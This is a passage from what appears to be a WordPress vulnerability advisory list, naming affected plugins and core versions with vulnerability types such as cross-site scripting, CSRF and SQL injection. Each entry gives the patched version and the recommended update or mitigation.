Recommended Action: Update to version 1.8.6, or a newer patched version

Plugin: Apollo13 Framework Extensions

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: WP Activity Log Premium

Vulnerability: Cross-Site Request Forgery via ajax_switch_db
Patched Version: 4.5.2
Recommended Action: Update to version 4.5.2, or a newer patched version

Plugin: WordPress Multisite User Sync/Unsync (Premium)

Vulnerability: No subtitle
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: ElasticPress

Vulnerability: Remote Code Execution
Patched Version: 4.4.1
Recommended Action: Update to version 4.4.1, or a newer patched version

Plugin: EZP Coming Soon Page

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Laybuy Payment Extension for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Redirection

Vulnerability: Missing Authorization in ‘SaveSettings’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Accordion and Accordion Slider

Vulnerability: Missing Authorization via ‘wp_aas_get_attachment_edit_form’ and ‘wp_aas_save_attachment_data’
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: SB Uploader

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Import Export Lite

Vulnerability: Unauthenticated Sensitive Data Disclosure
Patched Version: 3.9.16
Recommended Action: Update to version 3.9.16, or a newer patched version

Plugin: Email Log

Vulnerability: Admin+ SQL Injection
Patched Version: 2.4.7
Recommended Action: Update to version 2.4.7, or a newer patched version

Plugin: WP-Cirrus

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form Submissions

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.7.3
Recommended Action: Update to version 1.7.3, or a newer patched version

Plugin: Landing Page Builder – Coming Soon page, Maintenance Mode, Lead Page, WordPress Landing Pages

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting via Shortcode
Patched Version: 1.4.9.9
Recommended Action: Update to version 1.4.9.9, or a newer patched version

Plugin: Pricing Deals for WooCommerce

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Ovic Responsive WPBakery

Vulnerability: Authenticated (Subscriber+) Arbitrary Option Update
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.22
Recommended Action: Update to version 3.1.22, or a newer patched version

Plugin: iPages Flipbook For WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: Easy Digital Downloads – Conditional Success Redirects

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: PDF.js Viewer

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: Hide My WP Ghost – Security & Firewall

Vulnerability: IP Address Spoofing to Protection Mechanism Bypass
Patched Version: 5.0.20
Recommended Action: Update to version 5.0.20, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.1.19
Recommended Action: Update to version 8.1.19, or a newer patched version

Plugin: Classified Core

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.10
Recommended Action: Update to version 1.10, or a newer patched version

Plugin: Stripe Payment Plugin for WooCommerce

Vulnerability: Authentication Bypass
Patched Version: 3.7.8
Recommended Action: Update to version 3.7.8, or a newer patched version

Plugin: Client Portal : SuiteDash Direct Login

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: AdFoxly – Ad Manager, AdSense Ads & Ads.txt

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Floating Social Bar

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Portfolio for Elementor & Image Gallery | PowerFolio

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Twitget

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: Haxcan

Vulnerability: Authenticated (Admin+) Path Traversal to Arbitrary File Read
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Secure HTML5 Video Player

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Core: WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.7.9
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.9, 3.8.9, 3.9.7, 4.0.6, 4.1.6, 4.2.3

Plugin: Indeed Membership Pro

Vulnerability: Arbitrary File Upload
Patched Version: 7.6
Recommended Action: Update to version 7.6, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Request Forgery via ‘deleteCssAndJsCacheToolbar’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Loco Translate

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: Authorize.net Add-on for iThemes Exchange

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin

Vulnerability: SQL Injection
Patched Version: 1.3.59
Recommended Action: Update to version 1.3.59, or a newer patched version

Plugin: WP Photo Album Plus

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.4.18
Recommended Action: Update to version 5.4.18, or a newer patched version

Plugin: Thrive Automator

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.17.1
Recommended Action: Update to version 1.17.1, or a newer patched version

Plugin: Login Screen Manager

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Toolset Types – Custom Post Types, Custom Fields and Taxonomies

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.8
Recommended Action: Update to version 1.8.8, or a newer patched version

Plugin: BadgeOS

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 3.7.1.3
Recommended Action: Update to version 3.7.1.3, or a newer patched version

Plugin: 12 Step Meeting List

Vulnerability: Authenticated (Contributor+) Server-Side Request Forgery
Patched Version: 3.14.25
Recommended Action: Update to version 3.14.25, or a newer patched version

Plugin: WP Helper Premium

Vulnerability: Authenticated (Contributor+) SQL Injection
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Plugin: Custom Login Page Styler

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 6.2.5
Recommended Action: Update to version 6.2.5, or a newer patched version

Plugin: The Plus Addons for Elementor Page Builder

Vulnerability: Unauthenticated Local File Inclusion
Patched Version: 5.2.9
Recommended Action: Update to version 5.2.9, or a newer patched version

Plugin: Appointment Booking Calendar

Vulnerability: SQL Injection
Patched Version: 1.2.25
Recommended Action: Update to version 1.2.25, or a newer patched version

Plugin: BP Group Documents

Vulnerability: Path Traversal
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: WooFramework Tweaks

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Page Builder: Pagelayer – Drag and Drop website builder

Vulnerability: Missing Authorization to Stored Cross-Site Scripting
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: Themify Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Plugin: Image Hover Effects Ultimate (Image Gallery, Effects, Lightbox, Comparison or Magnifier)

Vulnerability: Reflected Cross-Site Scripting via effects
Patched Version: 9.7.1
Recommended Action: Update to version 9.7.1, or a newer patched version

Plugin: Rich Widget

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-Members Membership Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.8
Recommended Action: Update to version 3.1.8, or a newer patched version

Plugin: WooCommerce

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 5.2.0
Recommended Action: Update to version 5.2.0, or a newer patched version

Plugin: Zeno Font Resizer

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.8.0
Recommended Action: Update to version 1.8.0, or a newer patched version

Plugin: Nested Pages

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.1.21
Recommended Action: Update to version 3.1.21, or a newer patched version

Plugin: bSuite

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 5 alpha 3
Recommended Action: Update to version 5 alpha 3, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Missing Authorization via wpas_edit_reply_ajax()
Patched Version: 6.1.5
Recommended Action: Update to version 6.1.5, or a newer patched version

Core: WordPress

Vulnerability: Stored Cross-Site Scripting via File Uploads
Patched Version: 3.7.28
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.28, 3.8.28, 3.9.26, 4.0.25, 4.1.25, 4.2.22, 4.3.18, 4.4.17, 4.5.16, 4.6.13, 4.7.12, 4.8.8, 4.9.9, 5.0.1

Plugin: Contact Form and Calls To Action by vcita

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Plugin: Photo Gallery, Images, Slider in Rbs Image Gallery

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcodes
Patched Version: 3.2.13
Recommended Action: Update to version 3.2.13, or a newer patched version

Plugin: WPB Show Core

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Oceanwp sticky header

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Download Manager

Vulnerability: Authenticated (Admin+) Path Traversal
Patched Version: 3.2.55
Recommended Action: Update to version 3.2.55, or a newer patched version

Plugin: BMI BMR Calculator

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quiz Maker

Vulnerability: Content Spoofing
Patched Version: 6.3.9.5
Recommended Action: Update to version 6.3.9.5, or a newer patched version

Plugin: Link Library

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.9.12.30
Recommended Action: Update to version 5.9.12.30, or a newer patched version

Plugin: ThirstyAffiliates – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin

Vulnerability: Authorization Bypass and Cross-Site Request Forgery
Patched Version: 3.10.5
Recommended Action: Update to version 3.10.5, or a newer patched version

Plugin: Archivist – Custom Archive Templates

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: MailerLite – Signup forms (official)

Vulnerability: Not specified in this advisory (affected versions: Signup forms <= 1.5.3)
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: WordPress Online Booking and Scheduling Plugin – Bookly

Vulnerability: Cross-Site Scripting
Patched Version: 14.6
Recommended Action: Update to version 14.6, or a newer patched version

Core: WordPress

Vulnerability: Shortcode Execution in User Generated Content
Patched Version: 5.9.7
Recommended Action: Update to one of the following versions, or a newer patched version: 5.9.7, 6.0.5, 6.1.3, 6.2.2

Plugin: JS Job Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: Crazy Bone

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WIP Custom Login

Vulnerability: Missing Authorization
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: Gift Up Gift Cards for WordPress and WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.20.2
Recommended Action: Update to version 2.20.2, or a newer patched version

Plugin: Simple YouTube Responsive

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Social Rocket – Social Sharing Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Books & Papers

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 0.20220219
Recommended Action: Update to version 0.20220219, or a newer patched version

Plugin: Wp-Hide

Vulnerability: Missing Authorization to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Consultant

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quiz Maker

Vulnerability: Missing Authorization
Patched Version: 6.5.1.2
Recommended Action: Update to version 6.5.1.2, or a newer patched version

Plugin: WP Page Widget

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: Dynamically Register Sidebars

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Loginizer

Vulnerability: Reflected Cross-Site Scripting via ‘limit_session[count]’
Patched Version: 1.7.9
Recommended Action: Update to version 1.7.9, or a newer patched version

Plugin: Dynamic Visibility for Elementor

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Post Visibility Modification
Patched Version: 5.0.6
Recommended Action: Update to version 5.0.6, or a newer patched version

Plugin: Insert Pages

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.7.0
Recommended Action: Update to version 3.7.0, or a newer patched version

Plugin: Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss

Vulnerability: Authorization Bypass to Blocking Control Bypass
Patched Version: 1.9.10.69
Recommended Action: Update to version 1.9.10.69, or a newer patched version

Plugin: POEditor

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: MultiParcels Shipping For WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.15.2
Recommended Action: Update to version 1.15.2, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.9.9
Recommended Action: Update to version 2.9.9, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: Missing Authorization via AJAX actions
Patched Version: 7.6.4
Recommended Action: Update to version 7.6.4, or a newer patched version

Plugin: Convertful – Your Ultimate On-Site Conversion Tool

Vulnerability: Missing Authorization via add_woo_coupon
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: phpinfo() WP

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.0
Recommended Action: Update to version 5.0, or a newer patched version

Plugin: Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.16.11
Recommended Action: Update to version 1.16.11, or a newer patched version

Plugin: Bootstrap Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Tajer

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: HashThemes Demo Importer

Vulnerability: Missing Authorization to Database Wipe
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Modern Events Calendar Lite

Vulnerability: Reflected Cross-Site Scripting via current_month_divider parameter
Patched Version: 6.1.5
Recommended Action: Update to version 6.1.5, or a newer patched version

Plugin: WP-RSS-Spreadshirt-3DCube-Gallery

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Spam protection, Anti-Spam, FireWall by CleanTalk

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.21
Recommended Action: Update to version 6.21, or a newer patched version

Plugin: WP-EMail

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 2.67.3
Recommended Action: Update to version 2.67.3, or a newer patched version

Plugin: Photo Gallery by Ays – Responsive Image Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.4.4
Recommended Action: Update to version 4.4.4, or a newer patched version

Plugin: CHP Ads Block Detector

Vulnerability: Missing Authorization to Plugin Settings Update
Patched Version: 3.9.8
Recommended Action: Update to version 3.9.8, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.8
Recommended Action: Update to version 1.9.8, or a newer patched version

Plugin: HT Portfolio – WordPress Portfolio Plugin for Elementor

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Activation
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Scripts Organizer

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Abandoned Cart Lite for WooCommerce

Vulnerability: Improper Authorization via wcal_preview_emails
Patched Version: 5.16.1
Recommended Action: Update to version 5.16.1, or a newer patched version

Plugin: Participants Database

Vulnerability: SQL Injection
Patched Version: 1.9.5.6
Recommended Action: Update to version 1.9.5.6, or a newer patched version

Plugin: WP Tools Increase Maximum Limits, Repair, Server PHP Info, Javascript errors, File Permissions, Transients, Error Log

Vulnerability: Missing Authorization leading to Authenticated (Subscriber+) Authorization Bypass
Patched Version: 3.43
Recommended Action: Update to version 3.43, or a newer patched version

Plugin: WPML

Vulnerability: Missing Authorization to Translation Job Status Change
Patched Version: 4.5.11
Recommended Action: Update to version 4.5.11, or a newer patched version

Plugin: WORDPRESS VIDEO GALLERY

Vulnerability: Cross-Site Scripting
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.3.5
Recommended Action: Update to version 6.3.5, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.3.7
Recommended Action: Update to version 2.3.7, or a newer patched version

Plugin: wordpress-form-manager

Vulnerability: Authenticated Remote Command Execution
Patched Version: 1.7.3
Recommended Action: Update to version 1.7.3, or a newer patched version

Plugin: Cookie Monster

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced Dynamic Pricing for WooCommerce

Vulnerability: Cross-Site Request Forgery via migrateProductOnlyToCommon function
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: WP-T-Wap

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Infinite Scroll – Ajax Load More

Vulnerability: Authenticated (Admin+) Arbitrary File Read via Directory Traversal
Patched Version: 5.5.4.1
Recommended Action: Update to version 5.5.4.1, or a newer patched version

Plugin: lasTunes

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Facebook Page Photo Gallery

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MC4WP: Mailchimp for WordPress

Vulnerability: Missing Authorization via listen
Patched Version: 4.9.10
Recommended Action: Update to version 4.9.10, or a newer patched version

Plugin: TNIT Filter Gallery Plugin

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 0.0.7
Recommended Action: Update to version 0.0.7, or a newer patched version

Plugin: Related Posts for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: WP Custom Author URL

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: 10Web Booster – Website speed optimization, Cache & Page Speed optimizer

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.12.23
Recommended Action: Update to version 2.12.23, or a newer patched version

Plugin: Product Catalog Simple

Vulnerability: Sensitive Information Exposure via Product CSV
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: Sharebar

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Custom Field For WP Job Manager

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: WP Meta SEO

Vulnerability: Missing Authorization in ‘checkAllCategoryInSitemap’
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Plugin: Visual Website Collaboration, Feedback & Project Management – Atarim

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 3.13
Recommended Action: Update to version 3.13, or a newer patched version

Plugin: Download Monitor

Vulnerability: Authenticated Directory Traversal to Sensitive Information Exposure
Patched Version: 4.7.3
Recommended Action: Update to version 4.7.3, or a newer patched version

Plugin: Auto Upload Images

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Auto More Tag

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SupportFlow

Vulnerability: Cross-Site Scripting via a ticket excerpt
Patched Version: 0.7
Recommended Action: Update to version 0.7, or a newer patched version

Plugin: MashShare – Social Media Share Buttons, Social Share Icons

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.8.4
Recommended Action: Update to version 3.8.4, or a newer patched version

Plugin: Slider Revolution

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 6.6.13
Recommended Action: Update to version 6.6.13, or a newer patched version

Plugin: LifterLMS – WP LMS for eLearning, Online Courses, & Quizzes

Vulnerability: Stored Cross-Site Scripting via Import
Patched Version: 3.35.0
Recommended Action: Update to version 3.35.0, or a newer patched version

Core: WordPress

Vulnerability: Arbitrary File Upload
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: Shortcode Addons- with Visual Composer, Divi, Beaver Builder and Elementor Extension

Vulnerability: Unauthenticated Arbitrary Options Update
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Plugin: Under Construction

Vulnerability: Cross-Site Request Forgery via admin_action_install_weglot
Patched Version: 3.97
Recommended Action: Update to version 3.97, or a newer patched version

Plugin: Cosmetsy Core

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Portfolio Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.05
Recommended Action: Update to version 1.05, or a newer patched version

Plugin: Ray Enterprise Translation

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: AdPush

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.44
Recommended Action: Update to version 1.44, or a newer patched version

Plugin: Social Share, Social Login and Social Comments Plugin – Super Socializer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.13.30
Recommended Action: Update to version 7.13.30, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: World Travel Information

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 301 Redirects – Easy Redirect Manager

Vulnerability: Not specified in this advisory (affected versions: Easy Redirect Manager <= 2.40)
Patched Version: 2.45
Recommended Action: Update to version 2.45, or a newer patched version

Plugin: Visual Form Builder

Vulnerability: Unauthenticated Information Disclosure
Patched Version: 3.0.6
Recommended Action: Update to version 3.0.6, or a newer patched version

Plugin: Woocommerce Follow-ups

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.9.50
Recommended Action: Update to version 4.9.50, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via html_tag
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Database for Contact Form 7, WPforms, Elementor forms

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Master Slider – Responsive Touch Slider

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.7.5
Recommended Action: Update to version 3.7.5, or a newer patched version

Plugin: Job Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.7.25
Recommended Action: Update to version 0.7.25, or a newer patched version

Core: WordPress

Vulnerability: Security Hardening
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Image Compressor & Optimizer – iLoveIMG

Vulnerability: Not specified in this advisory (affected versions: iLoveIMG <= 1.0.5)
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: LiveSync for WordPress

Vulnerability: Cross-Site Request Forgery to Arbitrary Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Profile Builder Pro

Vulnerability: Authenticated Blind SQL Injection
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: Bellows Accordion Menu

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Ultimate Affiliate Pro WordPress Plugin

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

